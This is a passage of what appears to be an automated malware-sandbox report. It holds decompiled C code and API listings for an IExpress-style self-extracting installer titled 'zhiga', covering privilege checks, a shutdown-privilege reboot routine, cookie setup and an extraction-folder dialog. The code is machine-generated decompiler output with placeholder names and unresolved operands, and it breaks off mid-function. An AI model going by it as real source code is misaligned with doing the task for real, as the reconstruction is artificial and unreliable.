                                                                          • Part of subcall function 00A317EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A318DD), ref: 00A3181A
                                                                          • Part of subcall function 00A317EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A3182C
                                                                          • Part of subcall function 00A317EE: AllocateAndInitializeSid.ADVAPI32(00A318DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A318DD), ref: 00A31855
                                                                          • Part of subcall function 00A317EE: FreeSid.ADVAPI32(?,?,?,?,00A318DD), ref: 00A31883
                                                                          • Part of subcall function 00A317EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A318DD), ref: 00A3188A
                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A318EB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A318F2
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A3190A
                                                                        • GetLastError.KERNEL32 ref: 00A31918
                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A3192C
                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A31944
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A31964
                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00A3197A
                                                                        • FreeSid.ADVAPI32(?), ref: 00A3199C
                                                                        • LocalFree.KERNEL32(00000000), ref: 00A319A3
                                                                        • CloseHandle.KERNEL32(?), ref: 00A319AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                        • String ID:
                                                                        • API String ID: 2168512254-0
                                                                        • Opcode ID: 8e890dc0cb21ff2210e12fb27c699cab2bddba4e27f5c24f4c579c839dbd32aa
                                                                        • Instruction ID: 44fbf0d1da3d927f3498cb9c3d6220cedb9a037888ac98d0d90c0a6f94ef2d0f
                                                                        • Opcode Fuzzy Hash: 8e890dc0cb21ff2210e12fb27c699cab2bddba4e27f5c24f4c579c839dbd32aa
                                                                        • Instruction Fuzzy Hash: C0310A71A00219AFDB20DFE5EC98AAFBBBCFF19700F104429F585D2160DB359916CB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00A31F90(signed int __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				int _v12;
                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                        				void* _v28;
                                                                        				void* __ebx;
                                                                        				signed int _t13;
                                                                        				int _t21;
                                                                        				void* _t25;
                                                                        				int _t28;
                                                                        				signed char _t30;
                                                                        				void* _t38;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				signed int _t46;
                                                                        
                                                                        				_t41 = __esi;
                                                                        				_t38 = __edi;
                                                                        				_t30 = __ecx;
                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                        					L12:
                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                        						L14:
                                                                        						if( *0xa39a40 != 0) {
                                                                        							_pop(_t30);
                                                                        							_t44 = _t46;
                                                                        							_t13 =  *0xa38004; // 0xb6b6972c
                                                                        							_v8 = _t13 ^ _t46;
                                                                        							_push(_t38);
                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                        								_v24.PrivilegeCount = 1;
                                                                        								_v12 = 2;
                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                        								CloseHandle(_v28);
                                                                        								_t41 = _t41;
                                                                        								_push(0);
                                                                        								if(_t21 != 0) {
                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                        										_t25 = 1;
                                                                        									} else {
                                                                        										_t37 = 0x4f7;
                                                                        										goto L3;
                                                                        									}
                                                                        								} else {
                                                                        									_t37 = 0x4f6;
                                                                        									goto L4;
                                                                        								}
                                                                        							} else {
                                                                        								_t37 = 0x4f5;
                                                                        								L3:
                                                                        								_push(0);
                                                                        								L4:
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								E00A344B9(0, _t37);
                                                                        								_t25 = 0;
                                                                        							}
                                                                        							_pop(_t40);
                                                                        							return E00A36CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                        						} else {
                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                        							goto L16;
                                                                        						}
                                                                        					} else {
                                                                        						_t37 = 0x522;
                                                                        						_t28 = E00A344B9(0, 0x522, 0xa31140, 0, 0x40, 4);
                                                                        						if(_t28 != 6) {
                                                                        							goto L16;
                                                                        						} else {
                                                                        							goto L14;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					__eax = E00A31EA7(__ecx);
                                                                        					if(__eax != 2) {
                                                                        						L16:
                                                                        						return _t28;
                                                                        					} else {
                                                                        						goto L12;
                                                                        					}
                                                                        				}
                                                                        			}

















                                                                        0x00a31f90
                                                                        0x00a31f90
                                                                        0x00a31f93
                                                                        0x00a31f98
                                                                        0x00a31fa4
                                                                        0x00a31fa7
                                                                        0x00a31fc5
                                                                        0x00a31fcd
                                                                        0x00a31fdb
                                                                        0x00a31ee5
                                                                        0x00a31eea
                                                                        0x00a31ef1
                                                                        0x00a31ef4
                                                                        0x00a31f0c
                                                                        0x00a31f2e
                                                                        0x00a31f3a
                                                                        0x00a31f46
                                                                        0x00a31f4d
                                                                        0x00a31f58
                                                                        0x00a31f60
                                                                        0x00a31f61
                                                                        0x00a31f62
                                                                        0x00a31f75
                                                                        0x00a31f80
                                                                        0x00a31f77
                                                                        0x00a31f77
                                                                        0x00000000
                                                                        0x00a31f77
                                                                        0x00a31f64
                                                                        0x00a31f64
                                                                        0x00000000
                                                                        0x00a31f64
                                                                        0x00a31f0e
                                                                        0x00a31f0e
                                                                        0x00a31f13
                                                                        0x00a31f13
                                                                        0x00a31f14
                                                                        0x00a31f14
                                                                        0x00a31f16
                                                                        0x00a31f17
                                                                        0x00a31f1a
                                                                        0x00a31f1f
                                                                        0x00a31f1f
                                                                        0x00a31f86
                                                                        0x00a31f8f
                                                                        0x00a31fcf
                                                                        0x00a31fd3
                                                                        0x00000000
                                                                        0x00a31fd3
                                                                        0x00a31fa9
                                                                        0x00a31fb4
                                                                        0x00a31fbb
                                                                        0x00a31fc3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a31fc3
                                                                        0x00a31f9a
                                                                        0x00a31f9a
                                                                        0x00a31fa2
                                                                        0x00a31fd9
                                                                        0x00a31fda
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a31fa2

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00A31EFB
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00A31F02
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00A31FD3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2795981589-3733053543
                                                                        • Opcode ID: a3c87f098cfb7bc1e9693faff2331aa0e21ae48dc5f8399331280fec17d8ca71
                                                                        • Instruction ID: a574c51e60c09b3ea28157287257cc3adad2d352a6918105b85a1aabb6972824
                                                                        • Opcode Fuzzy Hash: a3c87f098cfb7bc1e9693faff2331aa0e21ae48dc5f8399331280fec17d8ca71
                                                                        • Instruction Fuzzy Hash: 2B21D6B1B403057BDB209BE19C4AFBF7BBCEB95B50F20052EFA02E6181D7758802D661
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A37155() {
                                                                        				void* _v8;
                                                                        				struct _FILETIME _v16;
                                                                        				signed int _v20;
                                                                        				union _LARGE_INTEGER _v24;
                                                                        				signed int _t23;
                                                                        				signed int _t36;
                                                                        				signed int _t37;
                                                                        				signed int _t39;
                                                                        
                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                        				_t23 =  *0xa38004; // 0xb6b6972c
                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                        					QueryPerformanceCounter( &_v24);
                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                        					_t39 = _t36;
                                                                        					if(_t36 == 0xbb40e64e || ( *0xa38004 & 0xffff0000) == 0) {
                                                                        						_t36 = 0xbb40e64f;
                                                                        						_t39 = 0xbb40e64f;
                                                                        					}
                                                                        					 *0xa38004 = _t39;
                                                                        				}
                                                                        				_t37 =  !_t36;
                                                                        				 *0xa38008 = _t37;
                                                                        				return _t37;
                                                                        			}











                                                                        0x00a3715d
                                                                        0x00a37161
                                                                        0x00a37165
                                                                        0x00a37178
                                                                        0x00a37182
                                                                        0x00a3718e
                                                                        0x00a37197
                                                                        0x00a371a0
                                                                        0x00a371b1
                                                                        0x00a371b8
                                                                        0x00a371c4
                                                                        0x00a371c7
                                                                        0x00a371cb
                                                                        0x00a371d5
                                                                        0x00a371da
                                                                        0x00a371da
                                                                        0x00a371dc
                                                                        0x00a371dc
                                                                        0x00a371e2
                                                                        0x00a371e5
                                                                        0x00a371ee

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A37182
                                                                        • GetCurrentProcessId.KERNEL32 ref: 00A37191
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00A3719A
                                                                        • GetTickCount.KERNEL32 ref: 00A371A3
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00A371B8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                        • String ID:
                                                                        • API String ID: 1445889803-0
                                                                        • Opcode ID: 35943aed9e131b00f268ca48aebc50ed9eb5e8f48b3bb2d48d18196ad6252990
                                                                        • Instruction ID: 6bf526da91e02dab95e65eb8eed9ce55dfa8935561e3852b9ebc74cded3d261f
                                                                        • Opcode Fuzzy Hash: 35943aed9e131b00f268ca48aebc50ed9eb5e8f48b3bb2d48d18196ad6252990
                                                                        • Instruction Fuzzy Hash: 0C113AB1D01218DBCB14DFF8DE48A9EB7F4EF18310F614A55F806E7220EA349A058B41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A36CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                        
                                                                        				SetUnhandledExceptionFilter(0);
                                                                        				UnhandledExceptionFilter(_a4);
                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                        			}



                                                                        0x00a36cf7
                                                                        0x00a36d00
                                                                        0x00a36d19

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A36E26,00A31000), ref: 00A36CF7
                                                                        • UnhandledExceptionFilter.KERNEL32(00A36E26,?,00A36E26,00A31000), ref: 00A36D00
                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00A36E26,00A31000), ref: 00A36D0B
                                                                        • TerminateProcess.KERNEL32(00000000,?,00A36E26,00A31000), ref: 00A36D12
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                        • String ID:
                                                                        • API String ID: 3231755760-0
                                                                        • Opcode ID: 2d51a813522bdd92ad579657c636fc1a516bfe90140abca04784b5d18987ae12
                                                                        • Instruction ID: 8f508ff5e7b64412803d0abbd6e23c7116d503ae340bed5e8afb57740c1a4acb
                                                                        • Opcode Fuzzy Hash: 2d51a813522bdd92ad579657c636fc1a516bfe90140abca04784b5d18987ae12
                                                                        • Instruction Fuzzy Hash: 56D0C932000218BBDB006BE1EC0CA593F28EB58212F444104F35982020CA7244528B52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 76%
                                                                        			E00A33210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                        				void* __edi;
                                                                        				void* _t6;
                                                                        				void* _t10;
                                                                        				int _t20;
                                                                        				int _t21;
                                                                        				int _t23;
                                                                        				char _t24;
                                                                        				long _t25;
                                                                        				int _t27;
                                                                        				int _t30;
                                                                        				void* _t32;
                                                                        				int _t33;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				int _t38;
                                                                        				int _t39;
                                                                        				void* _t42;
                                                                        				void* _t46;
                                                                        				CHAR* _t49;
                                                                        				void* _t58;
                                                                        				void* _t63;
                                                                        				struct HWND__* _t64;
                                                                        
                                                                        				_t64 = _a4;
                                                                        				_t6 = _a8 - 0x10;
                                                                        				if(_t6 == 0) {
                                                                        					_push(0);
                                                                        					L38:
                                                                        					EndDialog(_t64, ??);
                                                                        					L39:
                                                                        					__eflags = 1;
                                                                        					return 1;
                                                                        				}
                                                                        				_t42 = 1;
                                                                        				_t10 = _t6 - 0x100;
                                                                        				if(_t10 == 0) {
                                                                        					E00A343D0(_t64, GetDesktopWindow());
                                                                        					SetWindowTextA(_t64, "zhiga");
                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                        					__eflags =  *0xa39a40 - _t42; // 0x3
                                                                        					if(__eflags == 0) {
                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                        					}
                                                                        					L36:
                                                                        					return _t42;
                                                                        				}
                                                                        				if(_t10 == _t42) {
                                                                        					_t20 = _a12 - 1;
                                                                        					__eflags = _t20;
                                                                        					if(_t20 == 0) {
                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xa391e4, 0x104);
                                                                        						__eflags = _t21;
                                                                        						if(_t21 == 0) {
                                                                        							L32:
                                                                        							_t58 = 0x4bf;
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0);
                                                                        							L25:
                                                                        							E00A344B9(_t64, _t58);
                                                                        							goto L39;
                                                                        						}
                                                                        						_t49 = 0xa391e4;
                                                                        						do {
                                                                        							_t23 =  *_t49;
                                                                        							_t49 =  &(_t49[1]);
                                                                        							__eflags = _t23;
                                                                        						} while (_t23 != 0);
                                                                        						__eflags = _t49 - 0xa391e5 - 3;
                                                                        						if(_t49 - 0xa391e5 < 3) {
                                                                        							goto L32;
                                                                        						}
                                                                        						_t24 =  *0xa391e5; // 0x3a
                                                                        						__eflags = _t24 - 0x3a;
                                                                        						if(_t24 == 0x3a) {
                                                                        							L21:
                                                                        							_t25 = GetFileAttributesA(0xa391e4);
                                                                        							__eflags = _t25 - 0xffffffff;
                                                                        							if(_t25 != 0xffffffff) {
                                                                        								L26:
                                                                        								E00A3658A(0xa391e4, 0x104, 0xa31140);
                                                                        								_t27 = E00A358C8(0xa391e4);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 != 0) {
                                                                        									__eflags =  *0xa391e4 - 0x5c;
                                                                        									if( *0xa391e4 != 0x5c) {
                                                                        										L30:
                                                                        										_t30 = E00A3597D(0xa391e4, 1, _t64, 1);
                                                                        										__eflags = _t30;
                                                                        										if(_t30 == 0) {
                                                                        											L35:
                                                                        											_t42 = 1;
                                                                        											__eflags = 1;
                                                                        											goto L36;
                                                                        										}
                                                                        										L31:
                                                                        										_t42 = 1;
                                                                        										EndDialog(_t64, 1);
                                                                        										goto L36;
                                                                        									}
                                                                        									__eflags =  *0xa391e5 - 0x5c;
                                                                        									if( *0xa391e5 == 0x5c) {
                                                                        										goto L31;
                                                                        									}
                                                                        									goto L30;
                                                                        								}
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_push(0);
                                                                        								_t58 = 0x4be;
                                                                        								goto L25;
                                                                        							}
                                                                        							_t32 = E00A344B9(_t64, 0x54a, 0xa391e4, 0, 0x20, 4);
                                                                        							__eflags = _t32 - 6;
                                                                        							if(_t32 != 6) {
                                                                        								goto L35;
                                                                        							}
                                                                        							_t33 = CreateDirectoryA(0xa391e4, 0);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								goto L26;
                                                                        							}
                                                                        							_push(0);
                                                                        							_push(0x10);
                                                                        							_push(0);
                                                                        							_push(0xa391e4);
                                                                        							_t58 = 0x4cb;
                                                                        							goto L25;
                                                                        						}
                                                                        						__eflags =  *0xa391e4 - 0x5c;
                                                                        						if( *0xa391e4 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						__eflags = _t24 - 0x5c;
                                                                        						if(_t24 != 0x5c) {
                                                                        							goto L32;
                                                                        						}
                                                                        						goto L21;
                                                                        					}
                                                                        					_t34 = _t20 - 1;
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						EndDialog(_t64, 0);
                                                                        						 *0xa39124 = 0x800704c7;
                                                                        						goto L39;
                                                                        					}
                                                                        					__eflags = _t34 != 0x834;
                                                                        					if(_t34 != 0x834) {
                                                                        						goto L36;
                                                                        					}
                                                                        					_t37 = LoadStringA( *0xa39a3c, 0x3e8, 0xa38598, 0x200);
                                                                        					__eflags = _t37;
                                                                        					if(_t37 != 0) {
                                                                        						_t38 = E00A34224(_t64, _t46, _t46);
                                                                        						__eflags = _t38;
                                                                        						if(_t38 == 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xa387a0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L36;
                                                                        						}
                                                                        						_t63 = 0x4c0;
                                                                        						L9:
                                                                        						E00A344B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                        						_push(0);
                                                                        						goto L38;
                                                                        					}
                                                                        					_t63 = 0x4b1;
                                                                        					goto L9;
                                                                        				}
                                                                        				return 0;
                                                                        			}

























                                                                        0x00a3321b
                                                                        0x00a3321e
                                                                        0x00a33221
                                                                        0x00a3343c
                                                                        0x00a3343e
                                                                        0x00a3343f
                                                                        0x00a33445
                                                                        0x00a33447
                                                                        0x00000000
                                                                        0x00a33447
                                                                        0x00a33229
                                                                        0x00a3322a
                                                                        0x00a3322f
                                                                        0x00a333ec
                                                                        0x00a333f7
                                                                        0x00a33410
                                                                        0x00a33416
                                                                        0x00a3341d
                                                                        0x00a3342d
                                                                        0x00a3342d
                                                                        0x00a33438
                                                                        0x00000000
                                                                        0x00a33438
                                                                        0x00a33237
                                                                        0x00a33243
                                                                        0x00a33243
                                                                        0x00a33246
                                                                        0x00a332ee
                                                                        0x00a332f4
                                                                        0x00a332f6
                                                                        0x00a333d4
                                                                        0x00a333d6
                                                                        0x00a333db
                                                                        0x00a333dc
                                                                        0x00a333de
                                                                        0x00a333df
                                                                        0x00a33370
                                                                        0x00a33372
                                                                        0x00000000
                                                                        0x00a33372
                                                                        0x00a332fc
                                                                        0x00a33301
                                                                        0x00a33301
                                                                        0x00a33303
                                                                        0x00a33304
                                                                        0x00a33304
                                                                        0x00a3330a
                                                                        0x00a3330d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33313
                                                                        0x00a33318
                                                                        0x00a3331a
                                                                        0x00a33331
                                                                        0x00a33332
                                                                        0x00a3333a
                                                                        0x00a3333d
                                                                        0x00a3337c
                                                                        0x00a33388
                                                                        0x00a3338f
                                                                        0x00a33394
                                                                        0x00a33396
                                                                        0x00a333a4
                                                                        0x00a333ab
                                                                        0x00a333b6
                                                                        0x00a333be
                                                                        0x00a333c3
                                                                        0x00a333c5
                                                                        0x00a33435
                                                                        0x00a33437
                                                                        0x00a33437
                                                                        0x00000000
                                                                        0x00a33437
                                                                        0x00a333c7
                                                                        0x00a333c9
                                                                        0x00a333cc
                                                                        0x00000000
                                                                        0x00a333cc
                                                                        0x00a333ad
                                                                        0x00a333b4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a333b4
                                                                        0x00a33398
                                                                        0x00a33399
                                                                        0x00a3339b
                                                                        0x00a3339c
                                                                        0x00a3339d
                                                                        0x00000000
                                                                        0x00a3339d
                                                                        0x00a3334c
                                                                        0x00a33351
                                                                        0x00a33354
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3335c
                                                                        0x00a33362
                                                                        0x00a33364
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33366
                                                                        0x00a33367
                                                                        0x00a33369
                                                                        0x00a3336a
                                                                        0x00a3336b
                                                                        0x00000000
                                                                        0x00a3336b
                                                                        0x00a3331c
                                                                        0x00a33323
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33329
                                                                        0x00a3332b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3332b
                                                                        0x00a3324c
                                                                        0x00a3324c
                                                                        0x00a3324f
                                                                        0x00a332c8
                                                                        0x00a332ce
                                                                        0x00000000
                                                                        0x00a332ce
                                                                        0x00a33251
                                                                        0x00a33256
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33271
                                                                        0x00a33277
                                                                        0x00a33279
                                                                        0x00a33298
                                                                        0x00a3329d
                                                                        0x00a3329f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a332b0
                                                                        0x00a332b6
                                                                        0x00a332b8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a332be
                                                                        0x00a33280
                                                                        0x00a33289
                                                                        0x00a3328e
                                                                        0x00000000
                                                                        0x00a3328e
                                                                        0x00a3327b
                                                                        0x00000000
                                                                        0x00a3327b
                                                                        0x00000000

                                                                        APIs
                                                                        • LoadStringA.USER32(000003E8,00A38598,00000200), ref: 00A33271
                                                                        • GetDesktopWindow.USER32 ref: 00A333E2
                                                                        • SetWindowTextA.USER32(?,zhiga), ref: 00A333F7
                                                                        • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00A33410
                                                                        • GetDlgItem.USER32(?,00000836), ref: 00A33426
                                                                        • EnableWindow.USER32(00000000), ref: 00A3342D
                                                                        • EndDialog.USER32(?,00000000), ref: 00A3343F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$zhiga
                                                                        • API String ID: 2418873061-456855365
                                                                        • Opcode ID: 15a21818131798d4c224b325f2fc13b250d96ed482788673ef5e7dffdff34523
                                                                        • Instruction ID: 7b0eeb309b1a9858b187971389addd4f1380f2c486a9a1d24cddfb5094dd2efb
                                                                        • Opcode Fuzzy Hash: 15a21818131798d4c224b325f2fc13b250d96ed482788673ef5e7dffdff34523
                                                                        • Instruction Fuzzy Hash: ED516D3234835077EF219BB55C4DFBB695DDB56B52F108228F286EA1D0CEA4CE03A261
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00A32CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t13;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				void* _t27;
                                                                        				struct HRSRC__* _t31;
                                                                        				intOrPtr _t33;
                                                                        				void* _t43;
                                                                        				void* _t48;
                                                                        				signed int _t65;
                                                                        				struct HINSTANCE__* _t66;
                                                                        				signed int _t67;
                                                                        
                                                                        				_t13 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t13 ^ _t67;
                                                                        				_t65 = 0;
                                                                        				_t66 = __ecx;
                                                                        				_t48 = __edx;
                                                                        				 *0xa39a3c = __ecx;
                                                                        				memset(0xa39140, 0, 0x8fc);
                                                                        				memset(0xa38a20, 0, 0x32c);
                                                                        				memset(0xa388c0, 0, 0x104);
                                                                        				 *0xa393ec = 1;
                                                                        				_t20 = E00A3468F("TITLE", 0xa39154, 0x7f);
                                                                        				if(_t20 == 0 || _t20 > 0x80) {
                                                                        					_t64 = 0x4b1;
                                                                        					goto L32;
                                                                        				} else {
                                                                        					_t27 = CreateEventA(0, 1, 1, 0);
                                                                        					 *0xa3858c = _t27;
                                                                        					SetEvent(_t27);
                                                                        					_t64 = 0xa39a34;
                                                                        					if(E00A3468F("EXTRACTOPT", 0xa39a34, 4) != 0) {
                                                                        						if(( *0xa39a34 & 0x000000c0) == 0) {
                                                                        							L12:
                                                                        							 *0xa39120 =  *0xa39120 & _t65;
                                                                        							if(E00A35C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                        								if( *0xa38a3a == 0) {
                                                                        									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                        									if(_t31 != 0) {
                                                                        										_t65 = LoadResource(_t66, _t31);
                                                                        									}
                                                                        									if( *0xa38184 != 0) {
                                                                        										__imp__#17();
                                                                        									}
                                                                        									if( *0xa38a24 == 0) {
                                                                        										_t57 = _t65;
                                                                        										if(E00A336EE(_t65) == 0) {
                                                                        											goto L33;
                                                                        										} else {
                                                                        											_t33 =  *0xa39a40; // 0x3
                                                                        											_t48 = 1;
                                                                        											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                        												if(( *0xa39a34 & 0x00000100) == 0 || ( *0xa38a38 & 0x00000001) != 0 || E00A318A3(_t64, _t66) != 0) {
                                                                        													goto L30;
                                                                        												} else {
                                                                        													_t64 = 0x7d6;
                                                                        													if(E00A36517(_t57, 0x7d6, _t34, E00A319E0, 0x547, 0x83e) != 0x83d) {
                                                                        														goto L33;
                                                                        													} else {
                                                                        														goto L30;
                                                                        													}
                                                                        												}
